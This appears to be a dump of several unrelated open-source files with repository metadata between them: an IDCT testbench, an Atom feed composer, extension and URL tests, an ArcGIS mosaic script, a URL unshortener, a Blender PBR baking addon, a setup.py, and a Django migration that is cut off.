b0 = a0 + a3
b1 = a1 + a2
b2 = a1 - a2
b3 = a0 - a3
# Second Butterfly
a0 = c0 + c1
a1 = c0 - c1
a2 = c3 - c2
a3 = c3 + c2
c0 = a0
c1 = MSCALE(c1d4 * (a2 - a1))
c2 = MSCALE(c1d4 * (a2 + a1))
c3 = a3
idx = LS(i, 3)
y[idx+0] = b0 + c3
y[idx+1] = b1 + c2
y[idx+2] = b2 + c1
y[idx+3] = b3 + c0
y[idx+4] = b3 - c0
y[idx+5] = b2 - c1
y[idx+6] = b1 - c2
y[idx+7] = b0 - c3
# Retrieve correct accuracy. We have additional factor
# of 16 that must be removed.
for i in range(64):
v = y[i]
if v < 0:
y[i] = (v - 8)>>4
else:
y[i] = (v + 8)>>4
return 0
@testbench
def test():
ins = [
154, 192, 254, 239, 180, 128, 123, 110,
123, 180, 198, 180, 154, 136, 105, 136,
123, 136, 154, 136, 136, 123, 110, 123,
123, 154, 154, 180, 167, 136, 149, 123,
123, 154, 180, 180, 166, 154, 136, 123,
123, 154, 154, 166, 149, 180, 136, 136,
123, 136, 123, 123, 136, 198, 180, 154,
136, 110, 123, 123, 136, 154, 166, 136
]
outs = [None] * 64
expected = [
1077, -250, 114, -109, 76, -27, 56, 12,
-232, 156, -106, -16, -13, -9, -25, 8,
236, -74, 62, -20, 5, -4, 31, 6,
16, 48, -68, -18, -18, -7, 1, -16,
163, -30, -7, -25, 16, 23, -9, 22,
29, -9, -4, -4, -4, 13, -13, -8,
81, -2, -12, -10, 12, 15, 5, 11,
37, 3, -4, -7, -6, 6, 7, 18
]
ChenIDct(ins, outs)
for i in range(64):
print(outs[i])
assert outs[i] == expected[i]
test()
| mit | -2,255,885,441,398,530,600 | 30.871681 | 76 | 0.451617 | false | 2.848161 | false | false | false |
mblayman/handroll | handroll/composers/atom.py | 1 | 3542 | # Copyright (c) 2014, Matt Layman
from datetime import datetime
import io
import json
import os
import time
from werkzeug.contrib.atom import AtomFeed
from werkzeug.contrib.atom import FeedEntry
from handroll import logger
from handroll.composers import Composer
from handroll.exceptions import AbortError
from handroll.i18n import _
class AtomComposer(Composer):
"""Compose an Atom feed from an Atom metadata file (``.atom``).
The ``AtomComposer`` parses the metadata specified in the source file and
produces an XML Atom feed. ``AtomComposer`` uses parameters that are needed
by Werkzeug's ``AtomFeed`` API. Refer to the `Werkzeug documentation
<http://werkzeug.pocoo.org/docs/contrib/atom/>`_ for all the available
options.
The dates in the feed should be in `RfC 3339
<http://www.ietf.org/rfc/rfc3339.txt>`_ format (e.g.,
``2014-06-13T11:39:30``).
Here is a sample feed:
.. literalinclude:: ../sample/atom_sample.atom
"""
def compose(self, catalog, source_file, out_dir):
root, ext = os.path.splitext(os.path.basename(source_file))
filename = root + '.xml'
output_file = os.path.join(out_dir, filename)
if self._needs_update(source_file, output_file):
logger.info(_('Generating Atom XML for {source_file} ...').format(
source_file=source_file))
feed = self._parse_feed(source_file)
with open(output_file, 'wb') as out:
out.write(feed.to_string().encode('utf-8'))
out.write(b'<!-- handrolled for excellence -->\n')
else:
logger.debug(_('Skipping {filename} ... It is up to date.').format(
filename=filename))
def _needs_update(self, source_file, out_file):
"""Check if the output file needs to be updated by looking at the
modified times of the source file and output file."""
if os.path.exists(out_file):
return os.path.getmtime(source_file) > os.path.getmtime(out_file)
else:
# The file doesn't exist so it definitely needs to be "updated."
return True
def _parse_feed(self, source_file):
try:
with io.open(source_file, 'r', encoding='utf-8') as f:
metadata = json.loads(f.read())
if metadata.get('entries') is None:
raise ValueError(_('Missing entries list.'))
entries = metadata['entries']
# AtomFeed expects FeedEntry objects for the entries keyword so
# remove it from the metadata and add it after the feed is built.
del metadata['entries']
feed = AtomFeed(**metadata)
[feed.add(self._make_entry(entry)) for entry in entries]
except ValueError as error:
raise AbortError(_('Invalid feed {source_file}: {error}').format(
source_file=source_file, error=str(error)))
return feed
def _make_entry(self, data):
# Convert dates into datetime instances.
if 'updated' in data:
data['updated'] = self._convert_date(data['updated'])
if 'published' in data:
data['published'] = self._convert_date(data['published'])
return FeedEntry(**data)
def _convert_date(self, date):
"""Convert a date string into a datetime instance. Assumes date string
        is RfC 3339 format."""
time_s = time.strptime(date, '%Y-%m-%dT%H:%M:%S')
return datetime.fromtimestamp(time.mktime(time_s))
| bsd-2-clause | 2,655,987,242,932,133,000 | 35.895833 | 79 | 0.620553 | false | 4.043379 | false | false | false |
rockyzhang/workload-automation | wlauto/tests/test_extension.py | 1 | 7254 | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=E0611,R0201,E1101
from unittest import TestCase
from nose.tools import assert_equal, raises, assert_true
from wlauto.core.extension import Extension, Parameter, Param, ExtensionMeta, Module
from wlauto.utils.types import list_of_ints
from wlauto.exceptions import ConfigError
class MyMeta(ExtensionMeta):
virtual_methods = ['validate', 'virtual1', 'virtual2']
class MyBaseExtension(Extension):
__metaclass__ = MyMeta
name = 'base'
parameters = [
Parameter('base'),
]
def __init__(self, **kwargs):
super(MyBaseExtension, self).__init__(**kwargs)
self.v1 = 0
self.v2 = 0
self.v3 = ''
def virtual1(self):
self.v1 += 1
self.v3 = 'base'
def virtual2(self):
self.v2 += 1
class MyAcidExtension(MyBaseExtension):
name = 'acid'
parameters = [
Parameter('hydrochloric', kind=list_of_ints, default=[1, 2]),
'citric',
('carbonic', int),
]
def __init__(self, **kwargs):
super(MyAcidExtension, self).__init__(**kwargs)
self.vv1 = 0
self.vv2 = 0
def virtual1(self):
self.vv1 += 1
self.v3 = 'acid'
def virtual2(self):
self.vv2 += 1
class MyOtherExtension(MyBaseExtension):
name = 'other'
parameters = [
Param('mandatory', mandatory=True),
Param('optional', allowed_values=['test', 'check']),
]
class MyOtherOtherExtension(MyOtherExtension):
name = 'otherother'
parameters = [
Param('mandatory', override=True),
]
class MyOverridingExtension(MyAcidExtension):
name = 'overriding'
parameters = [
Parameter('hydrochloric', override=True, default=[3, 4]),
]
class MyThirdTeerExtension(MyOverridingExtension):
name = 'thirdteer'
class MultiValueParamExt(Extension):
name = 'multivalue'
parameters = [
Parameter('test', kind=list_of_ints, allowed_values=[42, 7, 73]),
]
class MyCoolModule(Module):
name = 'cool_module'
capabilities = ['fizzle']
def initialize(self):
self.fizzle_factor = 0 # pylint: disable=attribute-defined-outside-init
def fizzle(self):
self.fizzle_factor += 1
class MyEvenCoolerModule(Module):
name = 'even_cooler_module'
capabilities = ['fizzle']
def fizzle(self):
self.owner.self_fizzle_factor += 2
class MyModularExtension(Extension):
name = 'modular'
parameters = [
Parameter('modules', override=True, default=['cool_module']),
]
class MyOtherModularExtension(Extension):
name = 'other_modular'
parameters = [
Parameter('modules', override=True, default=[
'cool_module',
'even_cooler_module',
]),
]
def __init__(self, **kwargs):
super(MyOtherModularExtension, self).__init__(**kwargs)
self.self_fizzle_factor = 0
class FakeLoader(object):
modules = [
MyCoolModule,
MyEvenCoolerModule,
]
def get_module(self, name, owner, **kwargs): # pylint: disable=unused-argument
for module in self.modules:
if module.name == name:
return _instantiate(module, owner)
class ExtensionMetaTest(TestCase):
def test_propagation(self):
acid_params = [p.name for p in MyAcidExtension.parameters]
assert_equal(acid_params, ['modules', 'base', 'hydrochloric', 'citric', 'carbonic'])
@raises(ValueError)
def test_duplicate_param_spec(self):
class BadExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
Parameter('base'),
]
def test_param_override(self):
class OverridingExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
Parameter('base', override=True, default='cheese'),
]
assert_equal(OverridingExtension.parameters['base'].default, 'cheese')
@raises(ValueError)
def test_invalid_param_spec(self):
class BadExtension(MyBaseExtension): # pylint: disable=W0612
parameters = [
7,
]
def test_virtual_methods(self):
acid = _instantiate(MyAcidExtension)
acid.virtual1()
assert_equal(acid.v1, 1)
assert_equal(acid.vv1, 1)
assert_equal(acid.v2, 0)
assert_equal(acid.vv2, 0)
assert_equal(acid.v3, 'acid')
acid.virtual2()
acid.virtual2()
assert_equal(acid.v1, 1)
assert_equal(acid.vv1, 1)
assert_equal(acid.v2, 2)
assert_equal(acid.vv2, 2)
class ParametersTest(TestCase):
def test_setting(self):
myext = _instantiate(MyAcidExtension, hydrochloric=[5, 6], citric=5, carbonic=42)
assert_equal(myext.hydrochloric, [5, 6])
assert_equal(myext.citric, '5')
assert_equal(myext.carbonic, 42)
def test_validation_ok(self):
myext = _instantiate(MyOtherExtension, mandatory='check', optional='check')
myext.validate()
def test_default_override(self):
myext = _instantiate(MyOverridingExtension)
assert_equal(myext.hydrochloric, [3, 4])
myotherext = _instantiate(MyThirdTeerExtension)
assert_equal(myotherext.hydrochloric, [3, 4])
def test_multivalue_param(self):
myext = _instantiate(MultiValueParamExt, test=[7, 42])
myext.validate()
assert_equal(myext.test, [7, 42])
@raises(ConfigError)
def test_bad_multivalue_param(self):
myext = _instantiate(MultiValueParamExt, test=[5])
myext.validate()
@raises(ConfigError)
def test_validation_no_mandatory(self):
myext = _instantiate(MyOtherExtension, optional='check')
myext.validate()
@raises(ConfigError)
def test_validation_no_mandatory_in_derived(self):
_instantiate(MyOtherOtherExtension)
@raises(ConfigError)
def test_validation_bad_value(self):
myext = _instantiate(MyOtherExtension, mandatory=1, optional='invalid')
myext.validate()
class ModuleTest(TestCase):
def test_fizzle(self):
myext = _instantiate(MyModularExtension)
myext.load_modules(FakeLoader())
assert_true(myext.can('fizzle'))
myext.fizzle()
assert_equal(myext.fizzle_factor, 1)
def test_self_fizzle(self):
myext = _instantiate(MyOtherModularExtension)
myext.load_modules(FakeLoader())
myext.fizzle()
assert_equal(myext.self_fizzle_factor, 2)
def _instantiate(cls, *args, **kwargs):
# Needed to get around Extension's __init__ checks
return cls(*args, **kwargs)
| apache-2.0 | 7,303,976,956,362,171,000 | 24.363636 | 92 | 0.630824 | false | 3.605368 | true | false | false |
Cadasta/cadasta-platform | cadasta/search/tests/test_urls_async.py | 1 | 1424 | from django.test import TestCase
from django.core.urlresolvers import reverse, resolve
from ..views import async
class SearchUrlTest(TestCase):
def test_search(self):
actual = reverse('async:search:search',
kwargs={
'organization': 'habitat',
'project': '123',
})
expected = '/async/organizations/habitat/projects/123/search/'
assert actual == expected
resolved = resolve(
'/async/organizations/habitat/projects/123/search/')
assert resolved.func.__name__ == async.Search.__name__
assert resolved.kwargs['organization'] == 'habitat'
assert resolved.kwargs['project'] == '123'
# def test_search_export(self):
# actual = reverse('async:search:export',
# kwargs={
# 'organization': 'habitat',
# 'project': '123',
# })
# expected = '/async/organizations/habitat/projects/123/search/export/'
# assert actual == expected
# resolved = resolve(
# '/async/organizations/habitat/projects/123/search/export/')
# assert resolved.func.__name__ == async.SearchExport.__name__
# assert resolved.kwargs['organization'] == 'habitat'
# assert resolved.kwargs['project'] == '123'
| agpl-3.0 | 3,628,609,514,204,241,000 | 37.486486 | 79 | 0.543539 | false | 4.45 | true | false | false |
stuporglue/solar_scripts | dems2mosaic.py | 1 | 2191 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Create a Mosaic Dataset in the workspace and add all
# *.img rasters from the input directory
#
# python dems2mosaic.py "C:\workspace\dems" "C:\workspace" "26915.prj"
import arcpy,sys,os
from config import *
from distutils.spawn import *
from arcpy import *
################ Usage check and argument assigning
if len(sys.argv) != 4:
print "Usage: build_mosaic.py <input directory> <workspace/output dir> <.prj file>"
print "The input directory should have the img rasters in it"
print "Contents in the output directory will be overwritten"
exit(-1)
else:
inpath = config.get('paths','dem_output_dir')
workspacedir = config.get('arcgis','workspace')
prjfile = config.get('projection','prj_file')
arcpy.env.workspace = workspacedir
gdbname = config.get('arcgis','dem_mosaic_name')
# Create a File GeoDatabase to house the Mosaic dataset
arcpy.CreateFileGDB_management(workspacedir, gdbname)
# Create Mosaic Dataset
# http://resources.arcgis.com/en/help/main/10.2/index.html#//00170000008n000000
mdname = "DEM_MOSAIC"
noband = "1"
pixtype = "32_BIT_FLOAT"
pdef = "NONE"
wavelength = ""
arcpy.CreateMosaicDataset_management(gdbname, mdname, prjfile, noband, pixtype, pdef, wavelength)
# Add rasters to Mosaic Dataset
# http://resources.arcgis.com/en/help/main/10.2/index.html#//001700000085000000
mdname = gdbname + "/" + mdname
rastype = "ERDAS IMAGINE" # http://resources.arcgis.com/en/help/main/10.2/index.html#//009t0000000v000000
updatecs = "NO_CELL_SIZES"
updatebnd = "NO_BOUNDARY"
updateovr = "UPDATE_OVERVIEWS"
maxlevel = "0" # pyramid level
maxcs = ""
maxdim = ""
spatialref = ""
inputdatafilter = "*.img"
subfolder = "NO_SUBFOLDERS"
duplicate = "EXCLUDE_DUPLICATES"
buildpy = "NO_PYRAMIDS"
calcstats = "NO_STATISTICS" # CALCULATE_STATISTICS
buildthumb = "NO_THUMBNAILS"
comments = "Add Raster Datasets"
forcesr = "NO_FORCE_SPATIAL_REFERENCE"
arcpy.AddRastersToMosaicDataset_management(
mdname, rastype, inpath, updatecs, updatebnd, updateovr,
maxlevel, maxcs, maxdim, spatialref, inputdatafilter,
subfolder, duplicate, buildpy, calcstats,
buildthumb, comments, forcesr)
| gpl-2.0 | -110,512,337,708,578,380 | 30.753623 | 106 | 0.724783 | false | 2.913564 | false | false | false |
skevas/unshorten | isurlshortener/unshortener.py | 1 | 3295 | # -*- coding: utf-8 -*-
"""Unshortener Documentation
This module unshortens URLs
"""
import re
import http
from urllib.parse import urlparse
from http import client
from isurlshortener.exceptions import PathMissing, UnhandledHTTPStatusCode, LocationHeaderMissing, ProtocolException
class Unshortener(object):
#FIXME: Most servers redirect http to https --> special handling for that?
@staticmethod
def unshorten_url(url: str) -> str:
"""Tries to unshorten an URL by requesting it and checking HTTP status
Args:
url: URL to check. The url MUST contain a protocol (e.g., http://), a domain (e.g., example.net), and a path
(e.g., something/) --> http://example.net/something/
Returns:
Unshortened URL
Raises:
IsUrlShortener.LocationHeaderMissing: Server did not return a Location
IsUrlShortener.UnhandledHTTPStatusCode: Unsupported HTTP status code
"""
url = Unshortener._prepare_url(url)
if url.path is '' or url.path is '/':
raise PathMissing()
server_connection = Unshortener._get_connection(url)
server_connection.request('GET', url.path)
response = server_connection.getresponse()
if response.status in range(300, 309):
return Unshortener._get_location_from_header(response.getheaders())
elif response.status in range(200, 201):
return url.geturl()
else:
raise UnhandledHTTPStatusCode(response.status)
@staticmethod
def _get_location_from_header(headers: list) -> str:
"""Returns the location information from the headers
Args:
headers: Header returned from the server
Returns:
Location information
Raises:
IsUrlShortener.LocationHeaderMissing: Location field missing in the header
"""
for header_field in headers:
if header_field[0].lower() == 'location':
return header_field[1]
raise LocationHeaderMissing
@staticmethod
def _prepare_url(url: str) -> dict:
"""Prepares a given URL strict for the unshortener
Args:
url: URL prepare
Returns:
Dict with the prepared URL information
Raises:
IsUrlShortener.ProtocolException: http/https protocol prefix is missing
"""
if not re.findall('^(http[s]?://)', url):
raise ProtocolException('Invalid protocol or no protocol given')
return urlparse(url)
@staticmethod
def _get_connection(url: dict) -> [http.client.HTTPConnection, http.client.HTTPSConnection]:
"""Prepares a connection to a given server
Args:
url: URL with server information
Returns:
Connection to the server
Raises:
IsUrlShortener.ProtocolException: Protocol not supported
"""
if url.scheme == 'http':
return http.client.HTTPConnection(url.netloc)
elif url.scheme == 'https':
return http.client.HTTPSConnection(url.netloc)
else:
raise ProtocolException('Protocol Exception: "{}"'.format(url.scheme))
| mit | -8,120,319,903,030,770,000 | 31.95 | 120 | 0.617906 | false | 4.601955 | false | false | false |
gnovis/swift | swift_fca/swift_core/interval_fca.py | 1 | 1073 | from math import isinf
class Interval:
def __init__(self, val_from, val_to):
self._val_from = float(val_from)
self._val_to = float(val_to)
def __contains__(self, value):
return bool(self._val_from <= float(value) <= self._val_to)
def __str__(self):
return "{}-{}".format(self._val_from, self._val_to)
def is_open(self):
return bool(isinf(self._val_to))
class Intervals:
def __init__(self, intervals):
self._open_intervals = []
self._closed_intervals = []
for i in intervals:
if i.is_open():
self._open_intervals.append(i)
else:
self._closed_intervals.append(i)
def val_in_open_interval(self, value):
return self.val_in(self._open_intervals, value)
def val_in_closed_interval(self, value):
return self.val_in(self._closed_intervals, value)
def val_in(self, intervals, value):
for interval in intervals:
if value in interval:
return True
return False
| gpl-3.0 | -8,449,861,179,838,928,000 | 25.170732 | 67 | 0.564772 | false | 3.725694 | false | false | false |
oscurart/BlenderAddons | oscurart_bake_pbr_maps_linear.py | 1 | 13463 | import bpy
import os
def setSceneOpts():
global channels
global sizex
global sizey
global selected_to_active
# VARIABLES
sizex = bpy.context.scene.bake_pbr_channels.sizex
sizey = bpy.context.scene.bake_pbr_channels.sizey
selected_to_active= bpy.context.scene.bake_pbr_channels.seltoact
channels = {"metallic":["ME","GLOSSY"],
"occlusion":["AO","AO"],
"normal":["NM","NORMAL"],
"emit":["EM","EMIT"],
"roughness":["RO","ROUGHNESS"],
"opacity":["OP","TRANSMISSION"],
"albedo":["AT","DIFFUSE"]}
bpy.context.scene.render.image_settings.file_format = "OPEN_EXR"
bpy.context.scene.render.image_settings.color_mode = "RGBA"
bpy.context.scene.render.image_settings.exr_codec = "ZIP"
bpy.context.scene.render.image_settings.color_depth = "16"
#set bake options
bpy.context.scene.render.bake_type = "TEXTURE"
bpy.context.scene.render.bake.use_pass_direct = 0
bpy.context.scene.render.bake.use_pass_indirect = 0
bpy.context.scene.render.bake.use_pass_color = 1
bpy.context.scene.render.bake.use_selected_to_active = selected_to_active
#__________________________________________________________________________________
def mergeObjects():
global selectedObjects
global object
global selObject
    # group the selected objects and the active object
object = bpy.context.active_object
selectedObjects = bpy.context.selected_objects[:].copy()
selectedObjects.remove(bpy.context.active_object)
    # if selected-to-active, merge the remaining selected objects into a single mesh
if selected_to_active:
bpy.ops.object.select_all(action="DESELECT")
for o in selectedObjects:
o.select = True
bpy.context.scene.objects.active = selectedObjects[0]
bpy.ops.object.convert(target="MESH", keep_original=True)
selObject = bpy.context.active_object
bpy.ops.object.join()
bpy.ops.object.transform_apply(location=True, rotation=True, scale=True, properties=True)
else:
selObject=bpy.context.active_object
    # set the active object
bpy.context.scene.objects.active = object
#__________________________________________________________________________________
def createTempMats():
global ms
global copyMats
global roughMats
global transMats
global glossyMats
    # list of the original materials
if not selected_to_active:
ms = [mat.material for mat in object.material_slots]
else:
ms = [mat.material for mat in selObject.material_slots]
    # create copy materials and swap them into the material slots
for matType in ["_glossyTemp","_copyTemp","_roughnessTemp","_trans"]:
ims = 0
for mat in ms:
mc = mat.copy()
mc.name = mat.name+matType
if not selected_to_active:
object.material_slots[ims].material = mc
else:
selObject.material_slots[ims].material = mc
ims += 1
copyMats = [mat for mat in bpy.data.materials if mat.name.endswith("_copyTemp")]
glossyMats = [mat for mat in bpy.data.materials if mat.name.endswith("_glossyTemp")]
roughMats = [mat for mat in bpy.data.materials if mat.name.endswith("_roughnessTemp")]
transMats = [mat for mat in bpy.data.materials if mat.name.endswith("_trans")]
#__________________________________________________________________________________
# mixGlossy: blend in a fully metallic principled shader, driven by the original metallic value
def mixGlossy(material):
mat = material
for node in mat.node_tree.nodes[:]:
if node.type == "BSDF_PRINCIPLED":
nprin = mat.node_tree.nodes.new("ShaderNodeBsdfPrincipled") # nuevo principled
mix = mat.node_tree.nodes.new("ShaderNodeMixShader")
mat.node_tree.links.new(mix.inputs[2],nprin.outputs[0])
mat.node_tree.links.new(mix.inputs[1],node.outputs[0])
if node.inputs["Metallic"].is_linked:
mat.node_tree.links.new(mix.inputs[0],node.inputs['Metallic'].links[0].from_socket)
else:
mix.inputs[0].default_value = node.inputs['Metallic'].default_value
            # copy the metallic input
if node.inputs["Metallic"].is_linked:
mat.node_tree.links.new(mix.inputs[0],node.inputs["Metallic"].links[0].from_socket)
mat.node_tree.links.new(node.outputs['BSDF'].links[0].to_socket,mix.outputs[0])
            # copy settings from the original principled node to the new one
for entrada in ["Base Color","Roughness"]:
if node.inputs[entrada].is_linked:
mat.node_tree.links.new(nprin.inputs[entrada],node.inputs[entrada].links[0].from_socket)
nprin.inputs[entrada].default_value = node.inputs[entrada].default_value
node.inputs['Specular'].default_value = 0
node.inputs['Metallic'].default_value = 0 # ambos a cero
nprin.inputs['Specular'].default_value = 0
nprin.inputs['Metallic'].default_value = 1 # nuevo prin a 1
for link in mat.node_tree.links:
if link.to_socket.name == "Metallic":
mat.node_tree.links.remove(link)
#__________________________________________________________________________________
# desmetalizar: set metallic and specular to zero
def desmetalizar(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Metallic":
mat.node_tree.links.remove(link)
for matnode in mat.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
            # disconnect metallic and set it to zero
if matnode.inputs['Metallic'].is_linked:
matnode.inputs["Metallic"].default_value = 0
matnode.inputs["Specular"].default_value = 0
else:
matnode.inputs["Metallic"].default_value = 0
matnode.inputs['Specular'].default_value = 0
# destransparentizar: set transmission to zero
def destransparentizar(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Transmission":
mat.node_tree.links.remove(link)
for matnode in mat.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
            # disconnect transmission and set it to zero
if matnode.inputs['Transmission'].is_linked:
matnode.inputs["Transmission"].default_value = 0
else:
matnode.inputs["Transmission"].default_value = 0
# desespecular: remove all specular values
def desespecular(material):
for matnode in material.node_tree.nodes:
if matnode.type == "BSDF_PRINCIPLED":
matnode.inputs["Specular"].default_value = 0
# baseColorA1: set base color to white (1,1,1,1)
def baseColorA1(material):
for link in mat.node_tree.links:
if link.to_socket.name == "Base Color":
mat.node_tree.links.remove(link)
for node in mat.node_tree.nodes:
if node.type == "BSDF_PRINCIPLED":
node.inputs['Base Color'].default_value= (1,1,1,1)
# cambiaSlots: swap the material slots to the materials with the given suffix
def cambiaSlots(objeto,sufijo):
for ms in objeto.material_slots:
ms.material = bpy.data.materials[ms.material.name.rpartition("_")[0]+sufijo]
#__________________________________________________________________________________
def removeMatProps():
global mat
    # strip metallic from the _copyTemp copies
for mat in copyMats:
desmetalizar(mat)
destransparentizar(mat)
    # strip specular from the _glossyTemp copies and mix in the metallic shader
for mat in glossyMats:
desespecular(mat)
mixGlossy(mat)
destransparentizar(mat)
    # set the base color of the roughness copies to 1
for mat in roughMats:
desespecular(mat)
baseColorA1(mat)
destransparentizar(mat)
    # strip metallic for the transmission copies
for mat in transMats:
desmetalizar(mat)
desespecular(mat)
baseColorA1(mat)
#__________________________________________________________________________________
def bake(map):
    # create the output image
imgpath = "%s/IMAGES" % (os.path.dirname(bpy.data.filepath))
img = bpy.data.images.new(channels[map][0], width=sizex, height=sizey, alpha=True,float_buffer=True)
print ("Render: %s" % (channels[map][1]))
img.colorspace_settings.name = 'Linear'
if not selected_to_active:
img.filepath = "%s/%s_%s.exr" % (imgpath, object.name, channels[map][0])
else:
img.filepath = "%s/%s_%s.exr" % (imgpath, object.active_material.name, channels[map][0])
    # switch material slots depending on the map being baked
if channels[map][0] == "ME":
cambiaSlots(selObject,"_glossyTemp")
if channels[map][0] == "RO":
cambiaSlots(selObject,"_roughnessTemp")
if channels[map][0] in ["AT","AO","NM","EM","OP"]:
cambiaSlots(selObject,"_copyTemp")
if channels[map][0] in ["OP"]:
cambiaSlots(selObject,"_trans")
    # create the image nodes and bake
if not selected_to_active:
for activeMat in selObject.data.materials: #aca estaba el mscopy
            # set up the image node
node = activeMat.node_tree.nodes.new("ShaderNodeTexImage")
node.image = img
activeMat.node_tree.nodes.active = node
node.color_space = "NONE"
node.select = True
else:
activeMat = object.active_material
        # set up the image node
node = activeMat.node_tree.nodes.new("ShaderNodeTexImage")
node.image = img
activeMat.node_tree.nodes.active = node
node.color_space = "NONE"
node.select = True
bpy.ops.object.bake(type=channels[map][1])
img.save_render(img.filepath)
bpy.data.images.remove(img)
print ("%s Done!" % (channels[map][1]))
#__________________________________________________________________________________
def executePbr():
    # bake
setSceneOpts()
mergeObjects()
createTempMats()
removeMatProps()
for map in channels.keys():
if getattr(bpy.context.scene.bake_pbr_channels,map):
bake(map)
    # restore the original material slots
for matSlot,rms in zip(selObject.material_slots,ms):
matSlot.material = rms
    # remove the temporary copy materials
for ma in copyMats+glossyMats+roughMats+transMats:
bpy.data.materials.remove(ma)
    # delete the merged object
if selected_to_active:
bpy.data.objects.remove(selObject, do_unlink=True, do_id_user=True, do_ui_user=True)
class BakePbr (bpy.types.Operator):
"""Bake PBR materials"""
bl_idname = "object.bake_pbr_maps"
bl_label = "Bake PBR Maps"
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
executePbr()
return {'FINISHED'}
#__________________________________________________________________________________
class bakeChannels(bpy.types.PropertyGroup):
metallic = bpy.props.BoolProperty(name="Metallic",default=False)
occlusion = bpy.props.BoolProperty(name="Occlusion",default=False)
normal = bpy.props.BoolProperty(name="Normal",default=False)
emit = bpy.props.BoolProperty(name="Emit",default=False)
roughness = bpy.props.BoolProperty(name="Roughness",default=False)
opacity = bpy.props.BoolProperty(name="Opacity",default=False)
albedo = bpy.props.BoolProperty(name="Albedo",default=False)
sizex = bpy.props.IntProperty(name="Size x", default= 1024)
sizey = bpy.props.IntProperty(name="Size y", default= 1024)
seltoact = bpy.props.BoolProperty(name="Selected to active", default= True)
bpy.utils.register_class(bakeChannels)
class LayoutDemoPanel(bpy.types.Panel):
"""Creates a Panel in the scene context of the properties editor"""
bl_label = "Bake PBR"
bl_idname = "RENDER_PT_layout"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
def draw(self, context):
layout = self.layout
scene = context.scene
# Create a simple row.
layout.label(text=" Channels:")
row = layout.row()
row.prop(scene.bake_pbr_channels, "metallic")
row = layout.row()
row.prop(scene.bake_pbr_channels, "occlusion")
row = layout.row()
row.prop(scene.bake_pbr_channels, "normal")
row = layout.row()
row.prop(scene.bake_pbr_channels, "emit")
row = layout.row()
row.prop(scene.bake_pbr_channels, "roughness")
row = layout.row()
row.prop(scene.bake_pbr_channels, "opacity")
row = layout.row()
row.prop(scene.bake_pbr_channels, "albedo")
row = layout.row()
row.prop(scene.bake_pbr_channels, "sizex")
row.prop(scene.bake_pbr_channels, "sizey")
row = layout.row()
row.prop(scene.bake_pbr_channels, "seltoact")
# Big render button
row = layout.row()
row.scale_y = 2
row.operator("object.bake_pbr_maps")
#__________________________________________________________________________________
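# Usage note: once this script has been run, a "Bake PBR" panel appears under
# Properties > Render; baked EXR maps are written to an "IMAGES" folder next to
# the saved .blend file (see bake() above).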
bpy.types.Scene.bake_pbr_channels = bpy.props.PointerProperty(type=bakeChannels)
bpy.utils.register_class(LayoutDemoPanel)
bpy.utils.register_class(BakePbr) | gpl-2.0 | 6,051,950,876,114,977,000 | 35.193548 | 110 | 0.575578 | false | 3.5401 | false | false | false |
rcbops/opencenter-agent | setup.py | 1 | 2431 | #!/usr/bin/env python
# OpenCenter(TM) is Copyright 2013 by Rackspace US, Inc.
##############################################################################
#
# OpenCenter is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. This
# version of OpenCenter includes Rackspace trademarks and logos, and in
# accordance with Section 6 of the License, the provision of commercial
# support services in conjunction with a version of OpenCenter which includes
# Rackspace trademarks and logos is prohibited. OpenCenter source code and
# details are available at: # https://github.com/rcbops/opencenter or upon
# written request.
#
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 and a copy, including this
# notice, is available in the LICENSE file accompanying this software.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the # specific language governing permissions and limitations
# under the License.
#
##############################################################################
#
#
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def find_files(path_tuples):
output_array = []
for (path, destination) in path_tuples:
if os.path.isdir(path):
for d in os.walk(path):
if len(d[2]) != 0:
output_dir = d[0].replace(path, destination)
output_files = ["%s/%s" % (d[0], x) for x in d[2]]
output_array.append((output_dir, output_files))
else:
output_array.append((destination, [path]))
return output_array
setup(
name='opencenteragent',
version='0.1',
author='Rackspace US, Inc.',
description=('Yet another pluggable, modular host agent'),
license='Apache2',
url='https://github.com/rpedde/opencenter-agent',
long_description=read('README'),
packages=find_packages(),
data_files=find_files([['opencenteragent/plugins',
'share/opencenter-agent/plugins'],
['opencenter-agent.py', 'bin']])
)
| apache-2.0 | 8,020,559,618,043,347,000 | 36.984375 | 79 | 0.625257 | false | 4.134354 | false | false | false |
rdmorganiser/rdmo | rdmo/questions/migrations/0042_remove_null_true.py | 2 | 9265 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-03-13 11:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('questions', '0041_data_migration'),
]
operations = [
migrations.AlterField(
model_name='catalog',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this catalog.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='catalog',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this catalog.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this catalog in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this catalog in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
